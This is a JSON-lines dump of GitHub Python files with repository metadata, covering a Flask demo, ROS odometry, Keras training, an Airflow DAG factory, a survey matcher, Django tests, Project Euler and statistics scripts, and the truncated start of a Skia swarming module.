document.getElementById(\"heading\")\n\t\n\tstyle = heading.execute_js(f\"return {heading._code}.style\")\n\n\tif not isjsobj(style): return\n\n\tcolor = \"blue\" if style.color == \"red\" else \"red\"\n\n\theading.execute_js(\n\t\tf'{heading._code}.style=\"color: {color};\"'\n\t)\n\nscriptless.register_function(\n\tchangeHeading=change_heading\n)\n\n@app.route('/')\ndef index():\n\treturn scriptless.render(\n\t\trender_template(\"index.html\")\n\t)\n\n@app.route(\"/otherpage\")\ndef other():\n\treturn scriptless.render(\n\t\t\"other page\"\n\t)\n\n@app.route(\"/redirected\")\ndef redirected():\n\treturn scriptless.render(\n\t\t\"redirected here!\"\n\t)\n\t\nif __name__ == \"__main__\":\n\tapp.run()","repo_name":"User0332/ScriptLess","sub_path":"test_app/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":944,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"73656752806","text":"#!/usr/bin/env python\nimport rospy\nfrom geometry_msgs.msg import Twist\nfrom std_srvs.srv import TriggerResponse, Trigger\nfrom dynamixel_workbench_msgs.msg import DynamixelStateList\nfrom math import pi \n_pi = pi*0.1\n\ni_values = {}\nright_l, left_l, right_r, left_r = 0,0,0,0\nlinear,rotational = 0,0\nfirst = True\n\nlocal_odom_pub = rospy.Publisher('/ria/odom/local', Twist, queue_size=1)\n\ndef reset_initial(msg):\n global first\n response = TriggerResponse()\n first = True\n response.success = True\n rospy.loginfo(\"Initial value reseted\")\n return response\n\ndef odom(msg):\n global i_values, right_l, left_l,right_r, left_r, first, linear, rotational\n wheels = {}\n for i in msg.dynamixel_state:\n wheels[i.name] = i.present_position\n if first:\n i_values = wheels\n first = False \n else:\n right_l = _pi*((((wheels[\"Right_Rear\"] - i_values[\"Right_Rear\"]) + (-1*((wheels[\"Right_Front\"] - i_values[\"Right_Front\"]))))/2.0)/4096)\n left_l = _pi*((((wheels[\"Left_Rear\"] - i_values[\"Left_Rear\"]) + (-1*(wheels[\"Left_Front\"] - i_values[\"Left_Front\"])))/2.0)/4096)\n linear = ((right_l + left_l)/2)\n right_r = (((wheels[\"Right_Rear\"] - i_values[\"Right_Rear\"]) + (wheels[\"Right_Front\"] - i_values[\"Right_Front\"]))/2.0)/4095 \n left_r = (((wheels[\"Left_Rear\"] - i_values[\"Left_Rear\"]) + (wheels[\"Left_Front\"] - i_values[\"Left_Front\"]))/2.0)/4095\n rotational = (((right_r+left_r)/2)*_pi)/0.1\n rospy.loginfo(\"Linear: \"+str(linear)+\" Rotatinal: \"+str(rotational))\n # rospy.loginfo(\"R: \"+str(right)+\" L: \"+str(left)) #rotational)\n # rospy.loginfo(wheels)\n\ndef listener():\n global linear, rotational\n rospy.init_node('ria_odom',anonymous=True) \n rospy.Subscriber('/dynamixel_workbench/dynamixel_state',DynamixelStateList,odom)\n i_reset = rospy.Service('/ria/odom/reset', Trigger, reset_initial)\n rate= rospy.Rate(20)\n while not rospy.is_shutdown():\n pose = Twist()\n pose.linear.x = linear\n pose.angular.z = rotational\n local_odom_pub.publish(pose)\n rate.sleep()\n\nif __name__=='__main__':\n listener()\n","repo_name":"alwinmreji/marker_navigation","sub_path":"scripts/odom.py","file_name":"odom.py","file_ext":"py","file_size_in_byte":2113,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"15914509351","text":"import pyodbc\r\n\r\n\r\nkoneksi = pyodbc.connect('Driver={SQL Server};'\r\n 'Server=DESKTOP-57PI20C;'\r\n 'Database=ShareITSData;'\r\n 'Trusted_Connection=yes;')\r\n\r\n\r\ncursor = koneksi.cursor()\r\ncursor.execute('SELECT * FROM dbo.Dosen')\r\n\r\nfor row in cursor:\r\n print(row)\r\n\r\n","repo_name":"Manzila/FinalProjectMDI","sub_path":"connect.py","file_name":"connect.py","file_ext":"py","file_size_in_byte":329,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"18906052885","text":"# -*- coding: utf8 -*-\n'''\n Prueba 'Puente':\n Un cliente se conecta al servidor por el puerto 8080. Otro cliente\n se conecta a este mismo servidor por el puerto 8081. El primer cliente\n envia un paquete al servidor, este lo recibe y redirecciona su contenido\n al segundo cliente.\n Trascurrido 20 segundos el proceso se repite en sentido contrario\n \n Para llevar a cabo la prueba será necesario ejecutar:\n 1. ejecutar el serverWridge y esperar a que se informe de que la conexión \n está disponible\n 2. Ejecutar el clientReceptor.\n 3. Inmediatamente después ejecutar clientEmisor.\n \n Módulos necesarios:\n -serverWridge,clientEmisor,clientReceptor\n'''\nfrom network.manager.networkManager import NetworkManager\nfrom network.tests.ConvCallback import ConvCallback\nfrom time import sleep\n\nif __name__ == \"__main__\" :\n listP = []\n listP1 = []\n networkManager = NetworkManager()\n networkManager.startNetworkService()\n networkManager.listenIn(8080, ConvCallback(listP))\n networkManager.listenIn(8081, ConvCallback(listP1))\n print(\"The server is now ready\")\n #esperamos una respuesta\n while(len(listP) == 0):\n sleep(0.1)\n # Extraemos la contestacion\n ans = listP[0]\n #Se la enviamos al otro cliente\n p = networkManager.createPacket(0)\n p.writeString(ans) \n networkManager.sendPacket('', 8081, p)\n #Esperamos al de regreso\n while(len(listP1) == 0):\n sleep(0.1) \n # Extraemos la contestacion\n ans = listP1[0]\n #Se la enviamos al otro cliente\n p = networkManager.createPacket(0)\n p.writeString(ans) \n networkManager.sendPacket('', 8080, p) \n sleep(200)\n networkManager.stopNetworkService()\n","repo_name":"lbarriosh/cygnus-cloud","sub_path":"src/web/CygnusCloud/modules/network/tests/serverWridge.py","file_name":"serverWridge.py","file_ext":"py","file_size_in_byte":1820,"program_lang":"python","lang":"es","doc_type":"code","stars":4,"dataset":"github-code","pt":"52"} +{"seq_id":"43721467147","text":"####################################################\n# A permutation is an ordered arrangement of objects. For example, 3124 is one possible permutation of the digits 1, 2, 3 and 4. If all of the permutations are listed numerically or alphabetically, we call it lexicographic order. The lexicographic permutations of 0, 1 and 2 are:\n\n# 012 021 102 120 201 210\n\n# What is the millionth lexicographic permutation of the digits 0, 1, 2, 3, 4, 5, 6, 7, 8 and 9?\n####################################################\n\n# We have 10 digits\n# Once I choose the first digit, there are 9! possible permutations that start with that digit\n# 9! = 362,880\n# 1,000,000 / 362,880 = 2.756\n# So the millionth permutation will start with 2 (the third digit in order)\n# and will be the 1,000,000 - 2 * 362,880 = 274,240th permutation starting with 2\n\n# Now to the second digit\n# Once the second digit is picked, there are 8! = 40,320 permutations with that second digit\n# and so on\n\nfrom math import factorial\n\n# The set of digits\ndigits = [ n for n in range(10) ]\n\nperm_index = 1000000 - 1 # Zero indexing means that the millionth permutation is at index 999,999\n\n# Container for storing the result\npermutation_digits = []\n\n# While we have digits left to choose from, repeat the process described above\n# Find the next digit in order that we want, decrease the index appropriately, and remove the chosen digit from future consideration\nwhile len(digits) > 0:\n fac = factorial(len(digits)-1)\n next_digit_index = perm_index // fac\n next_digit = digits[next_digit_index]\n perm_index -= next_digit_index * fac\n\n digits.remove(next_digit)\n permutation_digits.append(next_digit)\n\nprint(''.join([str(x) for x in permutation_digits]))","repo_name":"Carifio24/ProjectEuler","sub_path":"problem_24.py","file_name":"problem_24.py","file_ext":"py","file_size_in_byte":1736,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"20547176234","text":"from keras.models import load_model\r\nfrom keras.models import Sequential\r\nfrom keras.layers import Dense, Activation, Dropout, Flatten, SeparableConv2D\r\nfrom keras.layers import Input, Add, Activation, BatchNormalization, Reshape, Lambda\r\nfrom keras.layers import Conv2D\r\nfrom keras.layers import MaxPooling2D\r\nfrom keras.callbacks import ModelCheckpoint,LearningRateScheduler,EarlyStopping\r\nfrom keras.optimizers import Adam, SGD\r\nfrom keras.datasets import cifar10\r\nfrom peleenet import PeleeNet\r\nfrom matplotlib import pyplot as plt\r\nimport os\r\nimport keras\r\nfrom keras import backend as K\r\nimport numpy as np\r\nnp.random.seed(42)\r\n\r\n# Add GPU option\r\nos.environ[\"CUDA_DEVICE_ORDER\"] = \"PCI_BUS_ID\"\r\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = \"3\"\r\n\r\nfrom keras.preprocessing.image import ImageDataGenerator\r\n\r\n\r\n# The data, split between train and test sets:\r\n(x_train, y_train), (x_test, y_test) = cifar10.load_data()\r\nprint('x_train shape:', x_train.shape)\r\nprint(x_train.shape[0], 'train samples')\r\nprint(x_test.shape[0], 'test samples')\r\nnum_classes = 10\r\n# Convert class vectors to binary class matrices.\r\ny_train = keras.utils.to_categorical(y_train, num_classes)\r\ny_test = keras.utils.to_categorical(y_test, num_classes)\r\n\r\n\r\n\r\nclass PlotLosses(keras.callbacks.Callback):\r\n def on_train_begin(self, logs={}):\r\n self.i = 0\r\n self.x = []\r\n self.losses = []\r\n self.val_losses = []\r\n \r\n self.fig = plt.figure()\r\n \r\n self.logs = []\r\n\r\n def on_epoch_end(self, epoch, logs={}):\r\n \r\n self.logs.append(logs)\r\n self.x.append(self.i)\r\n self.losses.append(logs.get('loss'))\r\n self.val_losses.append(logs.get('val_loss'))\r\n self.i += 1\r\n \r\n #clear_output(wait=True)\r\n fig_loss = plt.figure(figsize=(10, 10))\r\n plt.plot(self.x, self.losses, label=\"loss\")\r\n plt.plot(self.x, self.val_losses, label=\"val_loss\")\r\n plt.title(\"Learning Curve\")\r\n plt.xlabel(\"Epoch #\")\r\n plt.ylabel(\"Loss\")\r\n plt.legend()\r\n fig_loss.savefig(\"learning_curve_peleenet_cifar10.jpg\") \r\n #plt.savefig('learning_curve.jpg')\r\n #plt.show()\r\n\r\n\r\n\r\n# uncomment below if training from scratch\r\n#tr_model = PeleeNet()\r\n\r\n# load existing model\r\ntr_model = load_model('model_pelee_cifar10.h5')\r\ntr_model.summary()\r\n\r\nmodel_name ='model_pelee_cifar10.h5'\r\nplot_lr = PlotLosses()\r\n \r\n# model saving\r\ncheckpoint = ModelCheckpoint(model_name,monitor='val_acc',verbose=1,save_best_only=True)\r\nearly_stop = EarlyStopping(monitor='val_acc',min_delta=0,patience=200,verbose=1,mode='auto')\r\n\r\n# Compile the model\r\n#sgd = SGD(lr=0.01, decay=1e-6, momentum=0.9, nesterov=True)\r\n\r\ntr_model.compile(loss='categorical_crossentropy',optimizer=Adam(1e-5),metrics=['accuracy'])\r\n\r\n\r\nx_train = x_train.astype('float32')\r\nx_test = x_test.astype('float32')\r\nx_train /= 255\r\nx_test /= 255\r\n\r\n\r\ndata_augmentation = True\r\n\r\nif not data_augmentation:\r\n print('Not using data augmentation.')\r\n model.fit(x_train, y_train,\r\n batch_size=batch_size,\r\n epochs=epochs,\r\n validation_data=(x_test, y_test),\r\n shuffle=True)\r\nelse:\r\n print('Using real-time data augmentation.')\r\n # This will do preprocessing and realtime data augmentation:\r\n datagen = ImageDataGenerator(\r\n featurewise_center=False, # set input mean to 0 over the dataset\r\n samplewise_center=False, # set each sample mean to 0\r\n featurewise_std_normalization=False, # divide inputs by std of the dataset\r\n samplewise_std_normalization=False, # divide each input by its std\r\n zca_whitening=False, # apply ZCA whitening\r\n zca_epsilon=1e-06, # epsilon for ZCA whitening\r\n rotation_range=0, # randomly rotate images in the range (degrees, 0 to 180)\r\n # randomly shift images horizontally (fraction of total width)\r\n width_shift_range=0.1,\r\n # randomly shift images vertically (fraction of total height)\r\n height_shift_range=0.1,\r\n shear_range=0., # set range for random shear\r\n zoom_range=0., # set range for random zoom\r\n channel_shift_range=0., # set range for random channel shifts\r\n # set mode for filling points outside the input boundaries\r\n fill_mode='nearest',\r\n cval=0., # value used for fill_mode = \"constant\"\r\n horizontal_flip=True, # randomly flip images\r\n vertical_flip=False, # randomly flip images\r\n # set rescaling factor (applied before any other transformation)\r\n rescale=None,\r\n # set function that will be applied on each input\r\n preprocessing_function=None,\r\n # image data format, either \"channels_first\" or \"channels_last\"\r\n data_format=None,\r\n # fraction of images reserved for validation (strictly between 0 and 1)\r\n validation_split=0.0)\r\n\r\n # Compute quantities required for feature-wise normalization\r\n # (std, mean, and principal components if ZCA whitening is applied).\r\n datagen.fit(x_train)\r\n\r\n # Fit the model on the batches generated by datagen.flow().\r\n tr_model.fit_generator(datagen.flow(x_train, y_train,\r\n batch_size=32),\r\n epochs=1000,\r\n steps_per_epoch=1400,\r\n validation_data=(x_test, y_test),\r\n workers=4,\r\n callbacks = [checkpoint,plot_lr,early_stop])\r\n\r\n# plot the results\r\nplt.figure()\r\nplt.plot(history.history['acc'])\r\nplt.plot(history.history['val_acc'])\r\nplt.title('model_accuracy')\r\nplt.ylabel('accuracy')\r\nplt.xlabel('epoch')\r\nplt.legend(['train','test'])\r\nplt.savefig('peleenet_acc_cifar.jpg')\r\n","repo_name":"caikw0602/PeleeNet_keras","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":5851,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"69824732325","text":"from airflow import DAG\nfrom datetime import datetime, timedelta\nfrom class_module.task import Task\nfrom typing import List\n\nclass DagFactory:\n\n @classmethod\n def create_dag(cls, dagname, default_args={}, catchup=False, concurrency=5, cron=None) -> DAG:\n \"\"\"\n :param dagname(str): the name of the dag\n :param default_args(dict): a dict with the specific keys you want to edit from the original DEFAULT_ARGS\n :param catchup(bool): Perform scheduler catchup (or only run latest)? Defaults to True\n :param concurrency(int): the number of task instances allowed to run concurrently\n :param cron(str): the cron expression or the schedule\n :return: DAG object\n \"\"\"\n DEFAULT_ARGS={\n 'owner': 'airflow',\n 'depends_on_past': False,\n 'start_date': datetime(2021, 1, 1),\n 'email': ['airflow@company.com'],\n 'email_on_failure': True,\n 'email_on_retry': False,\n 'retries': 1,\n 'retry_delay': timedelta(minutes=5),\n }\n\n DEFAULT_ARGS.update(default_args)\n dagargs = {\n 'default_args': DEFAULT_ARGS,\n 'schedule_interval': cron,\n 'catchup': catchup,\n 'concurrency': concurrency\n }\n\n dag = DAG(dagname, **dagargs)\n return dag\n\n @classmethod\n def add_task_to_dag(cls, dag, tasks: List[Task]) -> DAG:\n \"\"\"\n :param dag(DAG)\n :param tasks(dict): dictionary in which each key is a callback. The value of that key is the task's dependencies.\n If a task has no dependencies (it's the first task), set an empty list [] as the value.\n IMPORTANT: all tasks have to be there even if they don't have dependencies\n :return: dag(DAG) with tasks\n \"\"\"\n with dag as dag:\n aux_dict = {}\n\n for task in tasks:\n task_dict = task.create_tasks(dag)\n\n for task_id, task in task_dict.items():\n aux_dict[task_id] = task\n\n for task in tasks:\n task_id = task.func.__name__\n for dep in task.dependencies:\n aux_dict[dep.__name__] >> aux_dict[task_id]\n return dag\n\n @classmethod\n def get_airflow_dag(cls, dagname, tasks, default_args={}, catchup=False, concurrency=5, cron=None) -> DAG:\n dag = cls.create_dag(dagname, default_args=default_args, catchup=catchup, concurrency=concurrency, cron=cron)\n dag = cls.add_task_to_dag(dag, tasks)\n return dag","repo_name":"nathan36/airflow_dags","sub_path":"class_module/dag_factory.py","file_name":"dag_factory.py","file_ext":"py","file_size_in_byte":2569,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"27018802362","text":"from pathlib import Path\nfrom urllib.parse import urljoin\n\n\nMAIN_DOC_URL = 'https://docs.python.org/3/'\nWHATS_NEW_URL = urljoin(MAIN_DOC_URL, 'whatsnew/')\nDOWNLOADS_URL = urljoin(MAIN_DOC_URL, 'download.html')\nPEPS_URL = 'https://peps.python.org/'\n\nBASE_DIR = Path(__file__).parent\nDOWNLOADS_DIR = 'downloads'\nRESULTS_DIR = 'results'\nLOG_DIR = BASE_DIR / 'logs'\nLOG_FILE = LOG_DIR / 'parser.log'\n\nDATETIME_FORMAT = '%Y-%m-%d_%H-%M-%S'\nLOG_DT_FORMAT = '%d.%m.%Y %H:%M:%S'\nLOG_FORMAT = '\"%(asctime)s - [%(levelname)s] - %(message)s\"'\n\nEXPECTED_STATUS = {\n 'A': ('Active', 'Accepted'),\n 'D': ('Deferred',),\n 'F': ('Final',),\n 'P': ('Provisional',),\n 'R': ('Rejected',),\n 'S': ('Superseded',),\n 'W': ('Withdrawn',),\n '': ('Draft', 'Active'),\n}\n\nPRETTY_OUTPUT = 'pretty'\nFILE_OUTPUT = 'file'\n\nOUTPUT_CHOICES = (PRETTY_OUTPUT, FILE_OUTPUT)\n","repo_name":"MarinaChernykh/bs4_parser_pep","sub_path":"src/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":858,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"31892313104","text":"import math\r\nnumber = ''\r\ntest = []\r\nimport string\r\nwith open(\"input_10.txt\") as file:\r\n int_number = file.readlines()\r\n for e in range(1,len(int_number)) :\r\n number = number +int_number[e]\r\n test.append(int(number))\r\n number = ''\r\nprint (test)\r\nx1 = []\r\nfor i in test:\r\n if i not in x1:\r\n x1.append(i)\r\nprint(x1)\r\n\r\nchast = []\r\nsumchast = []\r\nsuma = 0\r\nfor y in x1:\r\n h = 0\r\n for k in test :\r\n if(y==k):\r\n h += 1\r\n chast.append(h)\r\n suma += h\r\n sumchast.append(suma)\r\nprint(chast)\r\nfor y in range(len(x1)):\r\n print(\"Chislo = \",x1[y],\" Chastota = \",chast[y],\" SukupChast = \", sumchast[y])\r\n\r\nn = len(test)\r\nc = 0\r\nm = 0\r\n\r\nmediana = len(test)/2\r\nmediana = round(mediana)\r\nmediana = mediana - 1\r\nif n %2 == 0 :\r\n mediana = (test[mediana]+test[mediana + 1]) / 2\r\n print('медіана = ' + str(mediana))\r\nelse :\r\n print('медіана = ' +str(test[mediana]))\r\n\r\nfor i in range (n) :\r\n c = 0\r\n for j in range(n) :\r\n if (test[i] == test[j]) :\r\n c += 1\r\n if (c>m) :\r\n m = c\r\n moda = test[i]\r\nprint ('мода = '+ str(moda))\r\n\r\navg = sum(test) / len(test)\r\ndisp = sum((x-avg)**2 for x in test) / len(test)\r\nprint('дисперсія = ' +str(disp))\r\n\r\ninqRange = math.sqrt(disp)\r\nprint ('середнє квадратичне відхилення розподілу = ' + str(inqRange))\r\n\r\n\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\nimport pandas as pd\r\n\r\nplt.hist(test,bins = len(test)*5)\r\nplt.xlabel('число')\r\nplt.ylabel('частота')\r\nplt.show()\r\n\r\nmy_file = open(\"Result_input_\"+str(len(test))+\".txt\", \"w+\")\r\nmy_file.write(\"Дані з input_\"+str(len(test))+\".txt\")\r\nfor y in range(len(x1)):\r\n my_file.write(\"\\n число = \"+ str(x1[y])+\" частота = \"+str(chast[y])+\"сукупчаст = \"+str(sumchast[y]))\r\nmy_file.write(\"\\nмедіана = \"+ str(mediana)+ \"\\nмода = \"+str(moda)+\"\\nсереднє квадратичне відхилення = \" +str(inqRange)+ \"\\nдисперсія = \"+ str(disp) )\r\nmy_file.close()\r\n\r\n","repo_name":"Oleksandr-Siliaev/pythonproject1","sub_path":"moda.py","file_name":"moda.py","file_ext":"py","file_size_in_byte":2046,"program_lang":"python","lang":"uk","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"3172116541","text":"# Matcher\n# Program to match surevy takers by similar answers\n\n# Import Libraries\nimport csv, sys\n\n# Make Matches\n# This is the algorithm that matches each person in the list to their highest available preference\n#\n# Params\n# prefs: {str: [str]} \n# - Preference of people to be matched\n# - Each key in the dict is a person to be matched.\n# - Each value in the dict is an ordered list of people, ranked from first to last preference\n#\n# Returns\n# List of 2-tuples \ndef make_matches(prefs: {str: [str]}):\n # Empty list to hold matches\n matches = []\n \n # Get all of the people in the dict\n people = list(prefs.keys())\n\n # Index in the list\n i=0\n\n # As long as there is more than one person in the list,\n # continue running the algorithm\n while len(people) > 1:\n p = people[i] # Pull a person from the list at the current index\n top_pick = prefs[p][0] # Get that person's top prefenced\n top_pick_of_top_pick = prefs[top_pick][0] # Get the top pick of the top pick\n\n # If the top pick also wants the person, match them\n if p == top_pick_of_top_pick:\n # Add the match to matches\n matches.append((p, top_pick)) \n \n # Remove both from the pool of people \n people.remove(p) # Remove p from the list\n people.remove(top_pick) # Remove top pick from the list\n del prefs[p] # Delete p from the dict\n del prefs[top_pick] # Delete top pick from the dict\n \n # Remove both from ever other person's preference list\n for key in prefs:\n prefs[key].remove(p)\n prefs[key].remove(top_pick)\n else:\n # If the top pick doesn't have the person as first choice,\n # Do nothing and move onto the next person\n i += 1\n \n # If the end of the list is reached, \n # loop back around to the beginning\n if i >= len(people):\n i = 0\n\n # Return all of the matches\n return matches \n\n\n\n# Responses\n# This is a class representes all of the responses\n#\n# Attributes\n# answers: CSV List - list of the person's responses\n# id: str - id to represent the person (such as name)\n# ignore_indexes: [int] - indexes to ignore when comparing responses (name, email, etc.)\n# matches_detailed: [(str, double)] - (name, score) ranked in order of prefence \n# matches: [str] - Names of people in order of preference\n#\n# * matches and matches_detailed are empty lists until `compute_scores` is called\nclass Responses:\n \n def __init__(self, answers: [], id_index: int, ignore_indexes: [int]):\n self.answers = answers\n self.id = answers[id_index]\n self.ignore_indexes = ignore_indexes\n self.matches_detailed = []\n self.matches = []\n\n # Compute Scores\n # Given a list of other Responses, calculate the scores with each response.\n # The scores are then reordered from highest score to lowest score.\n #\n # Params\n # others: [Response]\n #\n # Returns\n # Void, but matches and matches_detailed will be updated\n def compute_scores(self, others: []):\n for other in others:\n if not other == self:\n self.matches_detailed.append((other.id, self.compare(other)))\n self.matches_detailed = sorted(self.matches_detailed, key=lambda r: r[1], reverse=True)\n self.matches = [m[0] for m in self.matches_detailed]\n\n # Compare\n # Compute the score between this and the other\n # Score is number of same answers divided by the number of total answers\n #\n # Params\n # other: Response\n #\n # Returns\n # Double - the score of the pair\n def compare(self, other):\n num_ans = len(self.answers)-len(self.ignore_indexes)\n num_same_ans = 0\n \n for i in range(len(self.answers)):\n if i not in self.ignore_indexes:\n if self.answers[i] == other.answers[i]:\n num_same_ans += 1\n\n\n similarity = num_same_ans / num_ans\n return similarity\n\n def csv(self):\n return self.id + ','+ str(self.matches)[1:-1]\n\n def __eq__(self, other):\n if other == None:\n return False\n if type(other) == str:\n return self.id == other\n return self.id == other.id\n \n def __repr__(self):\n return self.id + \": \" + str(self.answers) + '\\nMatches: ' + str(self.matches_detailed)\n\n\n\n# Match Email\n# This function was to output the matches in a format that could be emailed out to the people\ndef match_email(x, y):\n print(\"----------------\")\n print(x.answers[2])\n print(y.answers[2])\n print()\n print(\"-------------------------------------------------\")\n print(\"*Mesa Match* :two_hearts:\")\n print(x.id + \" and \" + y.id)\n print(\"_Congratulations, you two were matched!_\")\n print(\"-------------------------------------------------\")\n print()\n print(\"These were your responses. . .\")\n print()\n space = max(len(x.id), len(y.id))\n for i in range(len(x.answers)):\n if i not in x.ignore_indexes:\n if x.answers[i] == y.answers[i]: print(\":white_check_mark: \", end=\"\")\n else: print(\":x: \", end=\"\")\n print(\"_\" + questions[i] + \"_\",) \n print(f'>{x.id:<{space*2}} - {x.answers[i]}')\n print(f'>{y.id:<{space*2}} - {y.answers[i]}')\n print()\n print(\"----------------\")\n print(\"If you meet up, make sure to take a picture and post it in #mesa-meetups!\")\n\n\n# Main\nif __name__ == '__main__':\n # Get CSV file name\n if len(sys.argv) == 2:\n file_name = sys.argv[1]\n else:\n file_name = input(\"Input csv file name: \")\n\n # Read CSV \n csv_responses = csv.reader(open(file_name))\n\n # Create a list of people\n people = []\n for csv_response in csv_responses:\n response = Responses(csv_response, 1, [])\n people.append(response)\n \n # Pull the questions out of the responses and delete them\n questions = people[0].answers\n del people[0]\n\n # Calculate Matches\n for person in people:\n person.compute_scores(people) \n \n # Generate pref dict\n # {response.id : response.matches}\n pref_dict = {}\n for person in people:\n pref_dict[person.id] = person.matches\n \n # Pair the people based off their prefences\n matches = make_matches(pref_dict)\n for pair in matches:\n print(pair) \n\n ''' \n # Print Emails\n print()\n print(\"Printing emails. . .\")\n print()\n for match in matches:\n match_email(people[people.index(match[0])], people[people.index(match[1])])\n print()\n input(\"Press enter to continue\")\n print()\n '''\n\n # Print Results\n print()\n while True:\n name = input(\"Enter a name: \")\n try:\n i = people.index(name)\n print(people[i])\n except:\n print(\"Error: Person not found\")\n \n","repo_name":"ChaseC99/Matcher","sub_path":"matcher.py","file_name":"matcher.py","file_ext":"py","file_size_in_byte":7266,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"13002605781","text":"from django.contrib.auth import get_user_model\nfrom django.contrib.auth.models import Permission\nfrom django.contrib.contenttypes.models import ContentType\nfrom django.test import RequestFactory, TestCase, override_settings\n\nfrom bread.bread import Bread, BrowseView, ReadView\n\nfrom .factories import BreadTestModelFactory\nfrom .models import BreadTestModel\n\n# Set urlpatterns for a test by calling .set_urls()\nurlpatterns = None\n\n\n@override_settings(\n ROOT_URLCONF=\"tests.base\",\n BREAD={\n \"DEFAULT_BASE_TEMPLATE\": \"bread/empty.html\",\n },\n)\nclass BreadTestCase(TestCase):\n url_namespace = \"\"\n extra_bread_attributes = {}\n\n def setUp(self):\n self.username = \"joe\"\n self.password = \"random\"\n User = get_user_model()\n self.user = User.objects.create_user(username=self.username)\n self.user.set_password(self.password)\n self.user.save()\n assert self.client.login(username=self.username, password=self.password)\n self.model = BreadTestModel\n self.model_name = self.model._meta.model_name\n self.model_factory = BreadTestModelFactory\n self.request_factory = RequestFactory()\n\n class ReadClass(ReadView):\n columns = [\n (\"Name\", \"name\"),\n (\"Text\", \"other__text\"),\n (\n \"Model1\",\n \"model1\",\n ),\n ]\n\n class BrowseClass(BrowseView):\n columns = [\n (\"Name\", \"name\"),\n (\"Text\", \"other__text\"),\n (\"Model1\", \"model1\"),\n (\"Roundabout Name\", \"get_name\"),\n ]\n\n class BreadTestClass(Bread):\n model = self.model\n base_template = \"bread/empty.html\"\n browse_view = BrowseClass\n namespace = self.url_namespace\n plural_name = \"testmodels\"\n\n def get_additional_context_data(self):\n context = super(BreadTestClass, self).get_additional_context_data()\n context[\"bread_test_class\"] = True\n return context\n\n for k, v in self.extra_bread_attributes.items():\n setattr(BreadTestClass, k, v)\n\n self.BreadTestClass = BreadTestClass\n self.bread = BreadTestClass()\n\n def tearDown(self):\n global urlpatterns\n urlpatterns = None\n\n def set_urls(self, bread):\n # Given a bread instance, set its URLs on the test urlconf\n global urlpatterns\n urlpatterns = bread.get_urls()\n\n def get_permission(self, short_name):\n \"\"\"Return a Permission object for the test model.\n short_name should be browse, read, edit, add, or delete.\n \"\"\"\n return Permission.objects.get_or_create(\n content_type=ContentType.objects.get_for_model(self.model),\n codename=\"%s_%s\" % (short_name, self.model_name),\n )[0]\n\n def give_permission(self, short_name):\n self.user.user_permissions.add(self.get_permission(short_name))\n","repo_name":"caktus/django_bread","sub_path":"tests/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":3028,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"52"} +{"seq_id":"32111179669","text":"import re\n\nfood_string = input()\n\nmatches = re.finditer(r'([\\||#])([a-zA-Z ]+)\\1(\\d{2}/\\d{2}/\\d{2})\\1(\\d+)\\1', food_string)\ntotal_calories = 0\nnew_list = []\nfor match in matches:\n total_calories += int(match.group(4))\n new_list.append([match.group(2), match.group(3), match.group(4)])\ndays_to_last = total_calories // 2000\nprint(f\"You have food to last you for: {days_to_last} days!\")\n\nfor m in new_list:\n print(f\"Item: {m[0]}, Best before: {m[1]}, Nutrition: {m[2]}\")\n","repo_name":"pepapopova/SoftUni-Courses","sub_path":"Fundamentals/Exam preparation tasks/regex_tasks/ad_astra.py","file_name":"ad_astra.py","file_ext":"py","file_size_in_byte":478,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"38783805281","text":"from silica import Output, Input, fsm\n\n# @fsm\n# def spi_master(MOSI : Output,\n# MISO : Input,\n# byte_out : Input[8],\n# byte_in : Output[8]):\n# while True:\n# # Wait for byte to send and target slave\n# yield\n# byte_in = 0\n# # Select the slave\n# bit = 0x80\n# for i in range(7, -1, -1):\n# MOSI = byte_out[i]\n# # Yield the current bit and receive the next bit from slave\n# yield\n# byte_in[i] = MISO\n# # Deselect the slave\n# SS = 0\n\n\nslave_id = 0\n@fsm\ndef spi_slave(MOSI : In(Bit), \n MISO : Out(Bit), \n SS : In(Array(4, Bit)),\n SCK : In(Bit),\n byte_in : Out(Array(8, Bit)),\n byte_out : In(Array(8, Bit)),\n done : Out(Bit)):\n SCK_reg = Register(1)\n SCK_old_reg = Register(1)\n wire(SCK, SCK_reg.I[0])\n wire(SCK_reg.O, SCK_old_reg.I)\n while True:\n if SS == slave_id:\n for i in range(7, -1, -1):\n if not SCK_old_reg and SCK_reg:\n byte_in[i] = MOSI\n else:\n MISO = byte_out[i]\n yield\n done = 1\n yield\n done = 0\n else:\n yield\n","repo_name":"leonardt/silica-old","sub_path":"examples/old_examples/spi/spi.py","file_name":"spi.py","file_ext":"py","file_size_in_byte":1352,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"12744519285","text":"from recipe_engine import recipe_api\nimport shlex\n\n\nDEFAULT_TASK_EXPIRATION = 20*60*60\nDEFAULT_TASK_TIMEOUT = 4*60*60\nDEFAULT_IO_TIMEOUT = 40*60\n\nMILO_LOG_LINK = 'https://luci-milo.appspot.com/swarming/task/%s'\n\n\nclass SkiaSwarmingApi(recipe_api.RecipeApi):\n \"\"\"Provides steps to run Skia tasks on swarming bots.\"\"\"\n\n @property\n def swarming_temp_dir(self):\n \"\"\"Path where artifacts like isolate file 